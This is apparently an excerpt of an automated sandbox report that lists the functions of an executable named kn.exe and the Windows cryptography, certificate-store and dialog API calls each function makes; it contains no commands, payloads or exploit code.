Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD85EF74
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF7FD820F58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,7_2_00007FF7FD7C4F90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD838AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD838AA0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF7FD830ABC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD832AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF7FD832AE4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D2B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF7FD7D2B00
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD828AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF7FD828AFC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD814A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF7FD814A34
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF7FD830A18
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD834A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF7FD834A1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF7FD7A6A84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD862A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF7FD862A78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF7FD81EA7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF7FD7F29A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF7FD83099C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD86A9F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF7FD7FE9F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF7FD81AA00
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD838940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD838940
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD83C940
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BC960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF7FD7BC960
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD862994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF7FD862994
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF7FD83ACAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD824CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD824CA0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF7FD7F4CC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD888CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF7FD888CF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866CE0 NCryptEnumStorageProviders,#360,7_2_00007FF7FD866CE0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF7FD830D14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD822CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF7FD822CF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD832CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF7FD832CFC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CCC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF7FD7CCC24
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866C30 NCryptOpenStorageProvider,#360,7_2_00007FF7FD866C30
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF7FD830C3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD796C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF7FD796C4C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD868C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF7FD868C58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866C88 NCryptEnumAlgorithms,#360,7_2_00007FF7FD866C88
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD832C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF7FD832C80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD874C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF7FD874C80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF7FD85CBB4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BCB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF7FD7BCB98
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD860B9C CryptHashData,GetLastError,#357,7_2_00007FF7FD860B9C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD832BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD832BC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD860BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF7FD860BF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD89EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF7FD89EB38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF7FD830B80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D26E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF7FD7D26E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8666D8 NCryptFreeObject,#360,7_2_00007FF7FD8666D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8586D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF7FD8586D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C0630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7C0630
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD866654 NCryptGetProperty,#360,7_2_00007FF7FD866654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF7FD7FA654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD804694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF7FD804694
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C6694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF7FD7C6694
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8365B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF7FD8365B4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BC5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF7FD7BC5D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF7FD7F25E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B8600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF7FD7B8600
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD89A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF7FD89A58C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF7FD86A590
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF7FD82E57C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD89E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF7FD89E8B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7AA8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF7FD7AA8CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8308EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF7FD8308EC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD864914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD864914
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF7FD81E914
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B6824 CryptHashCertificate,GetLastError,#357,7_2_00007FF7FD7B6824
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF7FD830844
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8307A4 BCryptDestroyHash,#205,#357,7_2_00007FF7FD8307A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8407D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD8407D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8227BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD8227BC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7967CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7967CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF7FD81C7F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8307F4 BCryptDestroyKey,#205,#357,7_2_00007FF7FD8307F4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD868814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF7FD868814
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD822724 CryptDecodeObject,GetLastError,#357,7_2_00007FF7FD822724
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD830740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF7FD830740
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD86A740
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD868298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF7FD868298
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD89A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF7FD89A2E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D0300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF7FD7D0300
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD85E274
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD806280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD806280
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD852278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF7FD852278
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D21A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF7FD7D21A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8561AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF7FD8561AC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF7FD81A1E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD896214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF7FD896214
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD82E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF7FD82E1F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF7FD86A1F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD89613C CryptDecodeObjectEx,7_2_00007FF7FD89613C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF7FD7F417C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD816194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF7FD816194
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8024D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF7FD8024D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7A44E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD85E516
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF7FD7BC514
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF7FD80A450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF7FD80C450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD828488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD828488
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BE3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF7FD7BE3B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D23E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF7FD7D23E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7B4410
